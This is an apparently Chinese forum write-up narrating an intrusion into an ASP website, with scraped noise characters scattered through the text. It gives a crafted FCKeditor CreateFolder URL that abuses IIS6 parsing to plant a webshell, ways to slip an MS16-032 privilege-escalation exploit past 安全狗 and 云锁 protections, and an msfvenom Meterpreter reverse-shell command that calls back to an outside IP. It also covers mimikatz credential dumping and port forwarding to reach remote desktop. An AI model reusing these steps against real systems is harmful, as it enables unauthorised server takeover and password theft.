从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

admin

+ g5 K- L) ~6 ^+ i* ~7 Z2 r- ?- S: t% n3 I! F% R* f W) } `2 W& c0 U. p9 ~6 ^' Q: f7 D( E% S0 s$ E

* N" T/ j) L+ D# u9 g# b + a. v" ~) F* y5 h9 m T$ Z一、 利用getwebshell篇 ! y( @- ?) d0 a' G0 x% L 首先对目标站进行扫描，发现是asp的，直接扫出网站后台和默认数据库，下载解密登陆如图： , C- l. ~- L7 ^9 b$ w, U! [; f 下面进后台发现有fckeditor，而且还是iis6.0的，可以考虑创建个asp目录来构造解析（fck编辑器路径被改成别的需要burpsuite抓包的时候看到） 2 a3 e& f1 i0 e: K 下面我们构造一个asp目录，如： 9 y" n: ]: _3 H8 R9 h4 ]3 X ! b s( t7 ?6 H " h9 E+ j& V v, Z% D: y http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 v0 H+ t3 y2 Q. ?; h 7 a2 W0 {8 s: j% c2 V* u1 T8 R 6 i7 I* x f& j0 M. V5 P 然后再给shell.asp目录上传一个jpg图片格式的一句话，然后用hatchet打开，然后看了一下支持aspx，那么我们就用包含的办法先把aspx后缀名改成.rar，然后再创建个111.ASPx，里面包含rar文件，进去以后看进程有云锁和安全狗，那么，那么我们慢慢来，慢慢来。 ; D7 M4 Z( z# R' C 一、 绕过安全狗云锁提权并且加账号 ) f" q! H2 ^5 ?没法看系统信息，但是根据网站404页面可以断定是2003服务器，然后接着访问C:\Program Files (x86)存在断定是2003 64位系统，那么我们说干就干，我们上传ms16-032 64位直接干，但是发现上传exe或者别的格式exp会自动消失，看进程也没杀毒呀，没错没杀毒，是云锁有个功能防御了，那么突破云锁上传的方法就是利用rar，先把exp打包为64.rar上传，然后我们翻一下rar在哪个目录，在C:\Program Files (x86)，然后开干 如图： . M: x/ X3 p: P/ s2 W- ^ 然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组，我操后来也想着用getpassword64抓明文密码，但是一执行就卡死，没办法想到了metasploit 4 ?) r4 u& G$ V- K 3 E) {& Y# V& s/ |# G$ ]一、 利用metasploit & y1 f% Q2 x- c0 S, h 首先用pentestbox生成一个64位的payload如下命令 , \) ^. I" S- p( c. n msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe Q2 m" ~# f: ^, e+ z& [3 b/ X 为什么要用443端口，之前我测试用别的端口直接被墙了没法上线，下面我们在system下执行这个mata，上线如图： 下面我们用这个命令抓一下明文密码命令1：use mimikatz 命令2：kerberos如下图： 下面我们来做一个监听如下命令： - ~0 i) H3 z c0 u* H, U; |portfwd add -l 6655 -p 3968 -r 127.0.0.1，这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图：

. ^$ o4 J6 f1 v, \

, k$ |' f0 I9 m5 ~

" e6 X; u9 x" F8 x' q $ r% y7 H3 t& ^7 p

$ ?2 @ I x: G0 y/ Q1 I
, T1 X. F, m* z" [ z2 ` : f w" Z H5 ~3 o

图片怎么都没了